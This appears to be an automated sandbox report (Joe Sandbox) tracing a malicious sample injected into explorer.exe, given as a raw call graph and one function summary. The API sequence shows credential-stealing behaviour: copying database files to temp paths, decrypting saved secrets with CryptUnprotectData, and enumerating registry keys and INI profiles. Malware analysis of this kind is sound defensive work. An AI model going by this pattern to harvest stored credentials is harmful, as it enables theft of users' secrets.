27603 3271011 3 API calls 27602->27603 27603->27592 27605 3271eb4 27604->27605 27606 3271d62 27604->27606 27605->27566 27606->27605 27709 32719b4 27606->27709 27609 3271d8b 27612 3271953 6 API calls 27609->27612 27610 3271d79 27611 3271953 6 API calls 27610->27611 27613 3271d83 27611->27613 27612->27613 27613->27605 27614 3271da3 FindFirstFileW 27613->27614 27615 3271ead 27614->27615 27621 3271dba 27614->27621 27616 3271011 3 API calls 27615->27616 27616->27605 27617 3271dc5 lstrcmpiW 27619 3271e8e FindNextFileW 27617->27619 27620 3271ddd lstrcmpiW 27617->27620 27618 3271953 6 API calls 27618->27621 27619->27621 27622 3271ea2 FindClose 27619->27622 27620->27619 27626 3271df5 27620->27626 27621->27617 27621->27618 27623 327199d 9 API calls 27621->27623 27622->27615 27625 3271e54 lstrcmpiW 27623->27625 27624 32719b4 lstrlenW 27624->27626 27625->27626 27626->27624 27628 3271011 3 API calls 27626->27628 27629 3271953 6 API calls 27626->27629 27630 327199d 9 API calls 27626->27630 27631 3271d4a 12 API calls 27626->27631 27713 3271cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27626->27713 27628->27619 27629->27626 27630->27626 27631->27626 27714 3271162 VirtualQuery 27632->27714 27635 327102d 27635->27561 27636 327101d GetProcessHeap RtlFreeHeap 27636->27635 27637->27571 27639 32719f7 27638->27639 27640 32719fa RegOpenKeyExW 27638->27640 27639->27640 27641 3271aa2 27640->27641 27642 3271a28 RegQueryValueExW 27640->27642 27643 3271ab9 27641->27643 27646 32719e5 5 API calls 27641->27646 27644 3271a46 27642->27644 27645 3271a94 RegCloseKey 27642->27645 27643->27576 27644->27645 27652 3271000 GetProcessHeap RtlAllocateHeap 27644->27652 27645->27641 27645->27643 27646->27643 27648 3271a61 RegQueryValueExW 27649 3271a7f 27648->27649 27650 3271a8b 27648->27650 27649->27645 27651 3271011 3 API calls 27650->27651 27651->27649 27652->27648 27654 3271964 lstrlenW lstrlenW 27653->27654 27658 3271000 GetProcessHeap RtlAllocateHeap 27654->27658 27657 3271986 lstrcatW lstrcatW 27657->27579 27658->27657 27659->27586 27660->27598 27678 3271b6a 27661->27678 27663 3273e0f 27672 3273ec7 27663->27672 27684 3271c31 CreateFileW 27663->27684 27670 3273ebf 27671 3271011 3 API calls 27670->27671 27671->27672 27672->27602 27673 3273e6c RtlCompareMemory 27674 3273ea8 27673->27674 27676 3273e7e CryptUnprotectData 27673->27676 27675 3271011 3 API calls 27674->27675 27675->27670 27676->27674 27677->27599 27679 3271b6f 27678->27679 27680 3271b99 27678->27680 27679->27680 27681 3271b76 CreateFileW 27679->27681 27680->27663 27682 3271b95 27681->27682 27683 3271b8d CloseHandle 27681->27683 27682->27663 27683->27682 27685 3271c53 GetFileSize 27684->27685 27686 3271c98 27684->27686 27687 3271c63 27685->27687 27688 3271c90 CloseHandle 27685->27688 27686->27672 27694 3272fb1 27686->27694 27706 3271000 GetProcessHeap RtlAllocateHeap 27687->27706 27688->27686 27690 3271c6b ReadFile 27691 3271c80 27690->27691 27691->27688 27692 3271011 3 API calls 27691->27692 27693 3271c8e 27692->27693 27693->27688 27695 3272fb8 StrStrIA 27694->27695 27696 3272ff2 27694->27696 27695->27696 27697 3272fcd lstrlen StrStrIA 27695->27697 27696->27672 27700 327123b lstrlen 27696->27700 27697->27696 27698 3272fe7 27697->27698 27707 327190b 6 API calls 27698->27707 27701 3271256 CryptStringToBinaryA 27700->27701 27702 327129b 27700->27702 27701->27702 27703 3271272 27701->27703 27702->27670 27702->27673 27702->27674 27708 3271000 GetProcessHeap RtlAllocateHeap 27703->27708 27705 327127e CryptStringToBinaryA 27705->27702 27706->27690 27707->27696 27708->27705 27710 32719bc 27709->27710 27712 32719d4 27709->27712 27711 32719c3 lstrlenW 27710->27711 27710->27712 27711->27712 27712->27609 27712->27610 27713->27626 27715 3271019 27714->27715 27715->27635 27715->27636 28508 32a5d6f 20 API calls 28509 328a16f 33 API calls 28409 32a7762 memset memset memcpy 28410 3297f67 24 API calls 28411 327ab68 22 API calls 27739 3272f77 27744 3272e30 StrStrIW 27739->27744 27742 3272e30 22 API calls 27743 3272fab 27742->27743 27745 3272e57 27744->27745 27746 3272ebc 27744->27746 27747 32719e5 9 API calls 27745->27747 27770 3271000 GetProcessHeap RtlAllocateHeap 27746->27770 27749 3272e68 27747->27749 27749->27746 27771 3271bc5 10 API calls 27749->27771 27750 3272ed0 RegOpenKeyExW 27751 3272eee 27750->27751 27752 3272f68 27750->27752 27753 3272f50 RegEnumKeyExW 27751->27753 27760 3271953 6 API calls 27751->27760 27764 327199d 9 API calls 27751->27764 27767 3272e30 18 API calls 27751->27767 27769 3271011 3 API calls 27751->27769 27754 3271011 3 API calls 27752->27754 27753->27751 27756 3272f5e RegCloseKey 27753->27756 27757 3272f6f 27754->27757 27756->27752 27757->27742 27758 3272e75 27759 3272eb5 27758->27759 27761 3271afe 10 API calls 27758->27761 27762 3271011 3 API calls 27759->27762 27760->27751 27763 3272e83 27761->27763 27762->27746 27765 3272e91 27763->27765 27766 327199d 9 API calls 27763->27766 27764->27751 27768 3271011 3 API calls 27765->27768 27766->27765 27767->27751 27768->27759 27769->27751 27770->27750 27771->27758 28512 328c97b memcpy 28414 328f74d 18 API calls 28514 329e141 18 API calls 28415 3296340 92 API calls 28516 329e558 22 API calls 28517 327a558 18 API calls 28418 32b53ad memset memcpy memset memcpy 28518 32811a0 43 API calls 28419 3298ba6 7 API calls 28420 32913ca 89 API calls 28520 3299dbc 25 API calls 28421 32b33b7 27 API calls 28522 3297d8b _allrem memcpy 28423 328ab8b 19 API calls 28150 327639e 28154 327b1e5 28150->28154 28174 327b1e3 28150->28174 28151 32763b2 28155 327b214 28154->28155 28156 327b20d 28154->28156 28158 327b233 28155->28158 28160 327b28f 28155->28160 28228 327ae65 28155->28228 28210 327aeea 28156->28210 28158->28160 28194 327a7ae 28158->28194 28160->28151 28162 327b26d 28234 327a1c6 18 API calls 28162->28234 28163 327b2d6 28207 3276a5a 28163->28207 28166 327b2e8 28166->28160 28170 327b310 CreateFileMappingW 28166->28170 28171 327b37e 28170->28171 28172 327b32b MapViewOfFile 28170->28172 28235 327a1c6 18 API calls 28171->28235 28172->28166 28172->28171 28175 327b1e5 28174->28175 28176 327b214 28175->28176 28177 327aeea 27 API calls 28175->28177 28178 327b233 28176->28178 28179 327ae65 22 API calls 28176->28179 28180 327b28f 28176->28180 28177->28176 28178->28180 28181 327a7ae 18 API calls 28178->28181 28179->28178 28180->28151 28184 327b267 28181->28184 28182 327b26d 28284 327a1c6 18 API calls 28182->28284 28183 327b2d6 28185 3276a5a 17 API calls 28183->28185 28184->28180 28184->28182 28184->28183 28187 327a67c 22 API calls 28184->28187 28192 327b2e8 28185->28192 28188 327b2be 28187->28188 28188->28182 28188->28183 28189 327b310 CreateFileMappingW 28190 327b37e 28189->28190 28191 327b32b MapViewOfFile 28189->28191 28285 327a1c6 18 API calls 28190->28285 28191->28190 28191->28192 28192->28180 28192->28189 28196 327a7c7 28194->28196 28195 327a805 28195->28160 28195->28162 28195->28163 28198 327a67c 28195->28198 28196->28195 28236 327a1c6 18 API calls 28196->28236 28199 327a694 _alldiv _allmul 28198->28199 28200 327a6c1 28198->28200 28199->28200 28237 327a33b SetFilePointer 28200->28237 28203 327a6d4 28205 327a6ee 28203->28205 28241 327a1c6 18 API calls 28203->28241 28204 327a6f0 SetEndOfFile 28204->28203 28204->28205 28205->28162 28205->28163 28208 32c307c 17 API calls 28207->28208 28209 3276a65 28208->28209 28209->28166 28211 3276a81 memset 28210->28211 28212 327af01 28211->28212 28213 3276a81 memset 28212->28213 28215 327af07 28212->28215 28214 327af2a 28213->28214 28214->28215 28243 3277f07 28214->28243 28215->28155 28217 327af54 28217->28215 28246 32c52ae 28217->28246 28221 327affa 28222 327b020 28221->28222 28223 327b000 28221->28223 28224 327ae65 22 API calls 28222->28224 28270 327a1c6 18 API calls 28223->28270 28226 327b01c 28224->28226 28226->28215 28265 327adcc 28226->28265 28230 327ae7a 28228->28230 28229 327ae83 28229->28158 28230->28229 28231 327a67c 22 API calls 28230->28231 28232 327aea5 28231->28232 28232->28229 28283 327a1c6 18 API calls 28232->28283 28234->28160 28235->28160 28236->28195 28238 327a36a 28237->28238 28240 327a390 28237->28240 28238->28240 28242 327a1c6 18 API calls 28238->28242 28240->28203 28240->28204 28241->28205 28242->28240 28271 3277ec7 28243->28271 28247 32c52bb 28246->28247 28248 327afd9 28247->28248 28276 32aba08 _allmul 28247->28276 28250 327b87b 28248->28250 28251 327b88d memset 28250->28251 28258 327b8e5 28251->28258 28253 327b609 memset 28253->28258 28254 327ba3c 28254->28221 28255 327b965 CreateFileW 28255->28258 28258->28251 28258->28253 28258->28254 28258->28255 28259 327ba14 28258->28259 28261 327ba41 28258->28261 28277 327b64b 18 API calls 28258->28277 28278 327bb9f 18 API calls 28258->28278 28279 327a2aa 17 API calls 28258->28279 28280 327a1c6 18 API calls 28259->28280 28264 32c52ae _allmul 28261->28264 28262 327ba32 28281 32c4db2 17 API calls 28262->28281 28264->28254 28269 327ade4 28265->28269 28266 327ae5f 28266->28215 28268 327bafc 20 API calls 28268->28269 28269->28266 28269->28268 28282 327a39e 18 API calls 28269->28282 28270->28226 28272 3277ed4 28271->28272 28273 3277ed9 28271->28273 28272->28217 28275 3276e6a 17 API calls 28273->28275 28275->28272 28276->28248 28277->28258 28278->28258 28279->28258 28280->28262 28281->28254 28282->28269 28283->28229 28284->28180 28285->28180 28427 328cb91 18 API calls 28286 3271b9d 28287 3271ba2 28286->28287 28288 3271bc1 28286->28288 28287->28288 28289 3271ba9 GetFileAttributesW 28287->28289 28290 3271bb5 28289->28290 28428 32913ca 88 API calls 28429 327bf9a _alldiv 28524 3271198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28525 328fd97 19 API calls 28527 32799e1 strncmp 28528 32c55eb IsProcessorFeaturePresent 28430 3297be1 29 API calls 28530 327c9ea _allmul _alldiv 28531 327d1f7 memset _allmul _allmul 28532 32749f1 13 API calls 28433 3289ff0 32 API calls 28434 32913ca 72 API calls 27853 32747fa 27860 327479c 27853->27860 27856 327479c 23 API calls 27857 3274813 27856->27857 27858 327479c 23 API calls 27857->27858 27859 327481f 27858->27859 27861 3271afe 10 API calls 27860->27861 27862 32747af 27861->27862 27863 32747f1 27862->27863 27864 327199d 9 API calls 27862->27864 27863->27856 27868 32747bf 27864->27868 27865 32747ea 27866 3271011 3 API calls 27865->27866 27866->27863 27867 3271d4a 18 API calls 27867->27868 27868->27865 27868->27867 28436 32913ca 89 API calls 28533 32c3dc8 24 API calls 28441 32a73c4 22 API calls 28049 3279fc8 28050 3279fd3 28049->28050 28052 3279fd8 28049->28052 28051 3279ff4 HeapCreate 28051->28050 28053 327a004 28051->28053 28052->28050 28052->28051 28055 3277f70 17 API calls 28053->28055 28055->28050 28291 32763dd 28293 327b87b 21 API calls 28291->28293 28292 32763f4 28293->28292 28294 32715dd 28295 32715f3 lstrlen 28294->28295 28296 3271600 28294->28296 28295->28296 28305 3271000 GetProcessHeap RtlAllocateHeap 28296->28305 28298 3271608 lstrcat 28299 3271644 28298->28299 28300 327163d lstrcat 28298->28300 28306 3271333 28299->28306 28300->28299 28303 3271011 3 API calls 28304 3271667 28303->28304 28305->28298 28329 3271000 GetProcessHeap RtlAllocateHeap 28306->28329 28308 3271357 28330 327106c lstrlen MultiByteToWideChar 28308->28330 28310 3271366 28331 32712a3 RtlZeroMemory 28310->28331 28313 32713b8 RtlZeroMemory 28317 32713ed 28313->28317 28314 3271011 3 API calls 28315 32715d2 28314->28315 28315->28303 28316 32715b5 28316->28314 28317->28316 28333 3271000 GetProcessHeap RtlAllocateHeap 28317->28333 28319 32714a7 wsprintfW 28321 32714c9 28319->28321 28320 32715a1 28322 3271011 3 API calls 28320->28322 28321->28320 28334 3271000 GetProcessHeap RtlAllocateHeap 28321->28334 28322->28316 28324 3271533 28325 327159a 28324->28325 28335 327104c VirtualAlloc 28324->28335 28327 3271011 3 API calls 28325->28327 28327->28320 28328 327158a RtlMoveMemory 28328->28325 28329->28308 28330->28310 28332 32712c5 28331->28332 28332->28313 28332->28316 28333->28319 28334->28324 28335->28328 28342 32743d9 28349 3274317 _alloca_probe RegOpenKeyW 28342->28349 28345 3274317 25 API calls 28346 32743f5 28345->28346 28347 3274317 25 API calls 28346->28347 28348 3274403 28347->28348 28350 3274343 RegEnumKeyExW 28349->28350 28351 32743cf 28349->28351 28352 32743c4 RegCloseKey 28350->28352 28356 327436d 28350->28356 28351->28345 28352->28351 28353 3271953 6 API calls 28353->28356 28354 327199d 9 API calls 28354->28356 28356->28353 28356->28354 28357 3271011 3 API calls 28356->28357 28360 327418a 16 API calls 28356->28360 28358 327439b RegEnumKeyExW 28357->28358 28358->28356 28359 32743c3 28358->28359 28359->28352 28360->28356 28442 327ebd9 37 API calls 28536 3297c28 8 API calls 28540 327482b 14 API calls 28541 32ae024 93 API calls 27806 327f433 27807 327f445 27806->27807 27812 32823b9 27807->27812 27810 327f47c 27811 327f490 27810->27811 27820 327e206 58 API calls 27810->27820 27813 32823d3 27812->27813 27816 3282473 27812->27816 27815 3282431 27813->27815 27824 3283451 43 API calls 27813->27824 27815->27816 27821 32763f7 27815->27821 27816->27810 27818 328240f 27818->27815 27825 328235a 17 API calls 27818->27825 27820->27811 27826 327bafc 27821->27826 27822 3276400 27822->27816 27824->27818 27825->27815 27837 327b609 27826->27837 27828 327bb3f GetFileAttributesW 27830 327bb4b 27828->27830 27836 327bb14 27828->27836 27829 327bb1a 27829->27822 27832 327bb5b 27830->27832 27833 327bb7d 27830->27833 27831 327bb25 DeleteFileW 27831->27833 27831->27836 27840 327a1c6 18 API calls 27832->27840 27841 327a2aa 17 API calls 27833->27841 27836->27828 27836->27829 27836->27831 27836->27832 27842 327a08a 27837->27842 27839 327b60f 27839->27836 27840->27829 27841->27829 27843 327a0a4 27842->27843 27844 327a0aa 27843->27844 27846 3276a81 27843->27846 27844->27839 27847 3276a8f 27846->27847 27848 3276a95 memset 27847->27848 27849 3276aa4 27847->27849 27848->27849 27849->27844 28542 328943d 34 API calls 27929 3274406 27930 3272e30 22 API calls 27929->27930 27931 3274429 27930->27931 27932 3272e30 22 API calls 27931->27932 27933 327443a 27932->27933 28448 3290e0c 22 API calls 28449 327ca01 _allmul _alldiv _allmul _alldiv 28034 327a40e 28037 327a426 28034->28037 28043 327a4a2 28034->28043 28035 327a469 memcpy 28035->28043 28036 327a4cc ReadFile 28039 327a524 28036->28039 28036->28043 28037->28035 28038 327a44a memcpy 28037->28038 28037->28043 28041 327a45d 28038->28041 28048 327a2aa 17 API calls 28039->28048 28042 327a532 28042->28041 28044 327a53e memset 28042->28044 28043->28036 28043->28039 28045 327a501 28043->28045 28044->28041 28047 327a1c6 18 API calls 28045->28047 28047->28041 28048->28042 28547 32a9000 28 API calls 28548 32b5401 memset memcpy memcpy memset memcpy 28452 329f21c 23 API calls 28551 327581f _alldiv _allrem _allmul 28455 32a3e6b 20 API calls 28553 328f86a 31 API calls 28555 3274c6d 17 API calls 28556 32b2864 25 API calls 28558 32c507d 24 API calls 28559 328807c 23 API calls 28460 3290670 _allmul _allmul _allmul _alldvrm 28562 327b079 20 API calls 28462 32913ca 102 API calls 27934 3273c40 27935 3271b6a 2 API calls 27934->27935 27936 3273c50 27935->27936 27937 3273dfa 27936->27937 27970 3271000 GetProcessHeap RtlAllocateHeap 27936->27970 27939 3273c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27971 32c4bec 27939->27971 27941 3273dec DeleteFileW 27942 3271011 3 API calls 27941->27942 27942->27937 27943 3273c9a 27943->27941 27944 3273de3 27943->27944 27982 3271000 GetProcessHeap RtlAllocateHeap 27943->27982 27946 32c3848 76 API calls 27944->27946 27946->27941 27947 3273cce 27983 32902ec 94 API calls 27947->27983 27949 3273cd9 27950 3273da8 27949->27950 27956 3271fa7 19 API calls 27949->27956 27960 3273d2b lstrlen 27949->27960 27984 3271000 GetProcessHeap RtlAllocateHeap 27949->27984 27985 32902ec 94 API calls 27949->27985 27986 328fb92 93 API calls 27950->27986 27952 3273db1 lstrlen 27953 3273ddc 27952->27953 27954 3273db9 27952->27954 27955 3271011 3 API calls 27953->27955 27987 3271798 lstrlen 27954->27987 27955->27944 27956->27949 27958 3273dc8 27988 3271798 lstrlen 27958->27988 27960->27949 27962 3273d35 lstrlen 27960->27962 27961 3273dd2 27989 3271798 lstrlen 27961->27989 27962->27949 27966 3273d46 wsprintfA lstrlen 27967 3273d83 lstrcat 27966->27967 27968 3273d71 27966->27968 27969 3271011 3 API calls 27967->27969 27968->27967 27969->27949 27970->27939 27990 32c307c 27971->27990 27973 32c4c01 27980 32c4c44 27973->27980 28000 328c54d memset 27973->28000 27975 32c4c18 28001 328c871 21 API calls 27975->28001 27977 32c4c2a 28002 328c518 19 API calls 27977->28002 27979 32c4c33 27979->27980 28003 32c486f 89 API calls 27979->28003 27980->27943 27982->27947 27983->27949 27984->27966 27985->27949 27986->27952 27987->27958 27988->27961 27989->27953 27991 32c3095 27990->27991 27999 32c308e 27990->27999 27992 32c30ad 27991->27992 28017 32766ce 17 API calls 27991->28017 27994 32c30ed memset 27992->27994 27992->27999 27995 32c3108 27994->27995 27996 32c3116 27995->27996 28018 327c59d 17 API calls 27995->28018 27996->27999 28004 3276512 27996->28004 27999->27973 28000->27975 28001->27977 28002->27979 28003->27980 28019 327685c 28004->28019 28006 327651d 28006->27999 28007 3276519 28007->28006 28008 327bfec GetSystemInfo 28007->28008 28022 32765bd 28008->28022 28010 327c00e 28011 32765bd 16 API calls 28010->28011 28012 327c01a 28011->28012 28013 32765bd 16 API calls 28012->28013 28014 327c026 28013->28014 28015 32765bd 16 API calls 28014->28015 28016 327c032 28015->28016 28016->27999 28017->27992 28018->27996 28020 32c307c 17 API calls 28019->28020 28021 3276861 28020->28021 28021->28007 28023 32c307c 17 API calls 28022->28023 28024 32765c2 28023->28024 28024->28010 28566 3274440 24 API calls 28567 3296440 94 API calls 28463 32d9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28569 32b7452 19 API calls 28336 327105d VirtualFree 28466 3275e5a 28 API calls 27530 3279ea7 RtlAllocateHeap 27531 3279ec1 27530->27531 27532 3279ed9 27530->27532 27534 3277f70 17 API calls 27531->27534 27534->27532 27535 3272ea5 25 API calls 28571 328b0aa 84 API calls 27716 32724a4 27719 3272198 RtlZeroMemory GetVersionExW 27716->27719 27720 32721cb LoadLibraryW 27719->27720 27722 32721fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27720->27722 27723 327249b 27720->27723 27724 3272492 FreeLibrary 27722->27724 27729 3272244 27722->27729 27724->27723 27725 327247b 27725->27724 27726 3272365 RtlCompareMemory 27726->27729 27727 32722e1 RtlCompareMemory 27727->27729 27728 3271953 6 API calls 27728->27729 27729->27724 27729->27725 27729->27726 27729->27727 27729->27728 27730 3271011 GetProcessHeap RtlFreeHeap VirtualQuery 27729->27730 27731 32723f8 StrStrIW 27729->27731 27732 32717c0 9 API calls 27729->27732 27730->27729 27731->27729 27732->27729 28467 32756a2 _allrem 28572 328b8a6 90 API calls 28469 32913ca 89 API calls 28573 32913ca 87 API calls 28574 32878b9 33 API calls 27775 3272cb5 27776 3272cbe 27775->27776 27777 3271953 6 API calls 27776->27777 27778 3272cc3 27777->27778 27779 3271953 6 API calls 27778->27779 27781 3272e17 27778->27781 27780 3272cd9 27779->27780 27804 3271000 GetProcessHeap RtlAllocateHeap 27780->27804 27783 3272ce9 27805 3271000 GetProcessHeap RtlAllocateHeap 27783->27805 27785 3272cf9 27786 3271b6a 2 API calls 27785->27786 27787 3272d04 27786->27787 27788 3272d0c GetPrivateProfileSectionNamesW 27787->27788 27789 3272ded 27787->27789 27788->27789 27802 3272d22 27788->27802 27790 3271011 3 API calls 27789->27790 27791 3272e02 27790->27791 27792 3271011 3 API calls 27791->27792 27793 3272e09 27792->27793 27795 3271011 3 API calls 27793->27795 27794 3272d3f StrStrIW 27796 3272dd7 lstrlenW 27794->27796 27797 3272d53 GetPrivateProfileStringW 27794->27797 27798 3272e10 27795->27798 27796->27789 27796->27802 27797->27796 27799 3272d72 GetPrivateProfileIntW 27797->27799 27800 3271011 3 API calls 27798->27800 27799->27802 27800->27781 27801 3271953 6 API calls 27801->27802 27802->27789 27802->27794 27802->27796 27802->27801 27803 3271011 3 API calls 27802->27803 27803->27802 27804->27783 27805->27785 28470 32912bb _allmul _allmul _allmul _alldvrm _allmul 28575 32748b1 22 API calls 28576 3276eb7 24 API calls 28473 32796bc _alldiv _alldiv _alldiv _alldiv _allmul 28577 32b348f 27 API calls 28477 3280284 39 API calls 28480 3286698 30 API calls 28481 329069d _allmul 28582 32b2c9e 105 API calls 28484 327629a 23 API calls 28361 3273098 28362 3271b6a 2 API calls 28361->28362 28364 32730af 28362->28364 28363 32733a9 28364->28363 28385 3271000 GetProcessHeap RtlAllocateHeap 28364->28385 28366 32730ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28367 32c4bec 89 API calls 28366->28367 28370 3273126 28367->28370 28368 327339b DeleteFileW 28369 3271011 3 API calls 28368->28369 28369->28363 28370->28368 28371 3273392 28370->28371 28386 32902ec 94 API calls 28370->28386 28373 32c3848 76 API calls 28371->28373 28373->28368 28374 3273381 28389 328fb92 93 API calls 28374->28389 28377 32732cd CryptUnprotectData 28384 3273155 28377->28384 28378 327319c RtlCompareMemory 28378->28377 28378->28384 28379 32731d0 RtlZeroMemory 28387 3271000 GetProcessHeap RtlAllocateHeap 28379->28387 28381 3271fa7 19 API calls 28381->28384 28382 3271798 lstrlen 28382->28384 28383 3271011 3 API calls 28383->28384 28384->28374 28384->28377 28384->28378 28384->28379 28384->28381 28384->28382 28384->28383 28388 32902ec 94 API calls 28384->28388 28385->28366 28386->28384 28387->28384 28388->28384 28389->28371 28586 327f4ec 20 API calls 27733 3279ee8 27734 3279ef1 RtlFreeHeap 27733->27734 27735 3279f1a 27733->27735 27734->27735 27736 3279f02 27734->27736 27738 3277f70 17 API calls 27736->27738 27738->27735 28485 32913ca 88 API calls 28587 3274cf5 memset 28487 32a9ef6 114 API calls 28588 32913ca 89 API calls 27869 32728f8 27870 3272900 27869->27870 27871 3272ac8 27869->27871 27904 3271000 GetProcessHeap RtlAllocateHeap 27870->27904 27901 32c3848 27871->27901 27874 327290e 27905 32902ec 94 API calls 27874->27905 27877 3271011 3 API calls 27878 3272adf 27877->27878 27880 3272a98 lstrlen 27881 3272aa4 27880->27881 27882 3272ac1 27880->27882 27910 3271798 lstrlen 27881->27910 27884 3271011 3 API calls 27882->27884 27884->27871 27885 3272ab1 27911 3271798 lstrlen 27885->27911 27887 3272ab9 27912 3271798 lstrlen 27887->27912 27889 3271fa7 19 API calls 27890 3272919 27889->27890 27890->27889 27891 32729da lstrlen 27890->27891 27895 3272a8b 27890->27895 27906 3271000 GetProcessHeap RtlAllocateHeap 27890->27906 27907 3272112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27890->27907 27908 32902ec 94 API calls 27890->27908 27891->27890 27892 32729eb lstrlen 27891->27892 27892->27890 27909 328fb92 93 API calls 27895->27909 27897 3272a25 wsprintfA lstrlen 27898 3272a6a lstrcat 27897->27898 27899 3272a58 27897->27899 27900 3271011 3 API calls 27898->27900 27899->27898 27900->27890 27913 32c37cb 27901->27913 27904->27874 27905->27890 27906->27890 27907->27897 27908->27890 27909->27880 27910->27885 27911->27887 27912->27882 27914 32c37d6 27913->27914 27915 3272ad1 DeleteFileW 27913->27915 27925 32795b5 17 API calls 27914->27925 27915->27877 27917 32c37db 27918 32c37df 27917->27918 27921 32c37eb 27917->27921 27926 32c4da0 17 API calls 27918->27926 27920 32c3834 27928 32c3865 71 API calls 27920->27928 27921->27920 27923 32c381f 27921->27923 27927 3278795 22 API calls 27923->27927 27925->27917 27926->27915 27927->27915 27928->27915 28589 3275cc5 22 API calls 28590 3285cca 32 API calls 28489 329faca _allmul strcspn 28591 32c34ca 57 API calls 28594 3276eb7 22 API calls 28494 329c6da 23 API calls 28595 32a70de 24 API calls

                                                                        Executed Functions

                                                                        Function 03273717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 3273717-3273730 call 3271b6a 3 3273c37-3273c3d 0->3 4 3273736-327374c 0->4 5 3273762-327379c call 3271000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->5 6 327374e-327375e call 327302d 4->6 11 327379e-32737a3 call 327349b 5->11 12 32737a8-32737b5 call 32c4bec 5->12 6->5 11->12 16 3273c15-3273c1e DeleteFileW call 3271011 12->16 17 32737bb-32737d3 call 32aeeb8 12->17 21 3273c23-3273c28 16->21 22 3273c0c-3273c10 call 32c3848 17->22 23 32737d9-32737f1 call 3271000 call 32902ec 17->23 21->3 24 3273c2a-3273c32 call 3272ffa 21->24 22->16 31 32737f7 23->31 32 3273bd0-3273be3 call 328fb92 lstrlen 23->32 24->3 34 32737fc-3273816 call 3271fa7 31->34 37 3273c05-3273c07 call 3271011 32->37 38 3273be5-3273c00 call 3271798 * 3 32->38 42 3273bb6-3273bc6 call 32902ec 34->42 43 327381c-327382d 34->43 37->22 38->37 42->34 53 3273bcc 42->53 44 3273a37-3273a51 CryptUnprotectData 43->44 45 3273833-3273843 RtlCompareMemory 43->45 44->42 50 3273a57-3273a5c 44->50 45->44 48 3273849-327384b 45->48 48->44 52 3273851-3273856 48->52 50->42 54 3273a62-3273a78 call 3271fa7 50->54 52->44 57 327385c-3273861 52->57 53->32 61 3273a86-3273a9d call 3271fa7 54->61 62 3273a7a-3273a80 54->62 57->44 60 3273867-32738ed RtlZeroMemory call 3271000 57->60 73 32738f3-3273909 call 3271fa7 60->73 74 3273a2e-3273a32 60->74 68 3273a9f-3273aa5 61->68 69 3273aab-3273ac2 call 3271fa7 61->69 62->61 64 3273a82 62->64 64->61 68->69 71 3273aa7 68->71 79 3273ac4-3273aca 69->79 80 3273ad0-3273aed call 3271fa7 69->80 71->69 83 3273917-327392d call 3271fa7 73->83 84 327390b-3273911 73->84 77 3273bb1 call 3271011 74->77 77->42 79->80 82 3273acc 79->82 90 3273af7-3273b01 80->90 91 3273aef-3273af1 80->91 82->80 92 327392f-3273935 83->92 93 327393b-3273952 call 3271fa7 83->93 84->83 86 3273913 84->86 86->83 95 3273b03-3273b05 90->95 96 3273b0f-3273b1b lstrlen 90->96 91->90 94 3273af3 91->94 92->93 97 3273937 92->97 103 3273954-327395a 93->103 104 3273960-3273979 call 3271fa7 93->104 94->90 95->96 99 3273b07-3273b0b 95->99 96->42 100 3273b21-3273b2a lstrlen 96->100 97->93 99->96 100->42 102 3273b30-3273b4f call 3271000 100->102 110 3273b51 102->110 111 3273b59-3273b93 call 3272112 wsprintfA lstrlen 102->111 103->104 106 327395c 103->106 112 3273987-3273993 lstrlen 104->112 113 327397b-3273981 104->113 106->104 110->111 118 3273b95-3273ba1 call 327102f 111->118 119 3273ba3-3273baf lstrcat 111->119 112->74 117 3273999-32739a2 lstrlen 112->117 113->112 115 3273983 113->115 115->112 117->74 120 32739a8-32739c7 call 3271000 117->120 118->119 119->77 125 32739d1-3273a0b call 3272112 wsprintfA lstrlen 120->125 126 32739c9 120->126 129 3273a0d-3273a19 call 327102f 125->129 130 3273a1b-3273a29 lstrcat call 3271011 125->130 126->125 129->130 130->74
                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03273778
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273782
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 03273789
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273794
                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0327383B
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 03273870
                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 0327398B
                                                                        • lstrlen.KERNEL32(00000000), ref: 0327399A
                                                                        • wsprintfA.USER32 ref: 032739F1
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 032739FD
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273A21
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03273A49
                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03273B13
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273B22
                                                                        • wsprintfA.USER32 ref: 03273B79
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273B85
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273BA9
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03273BDA
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03273C16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
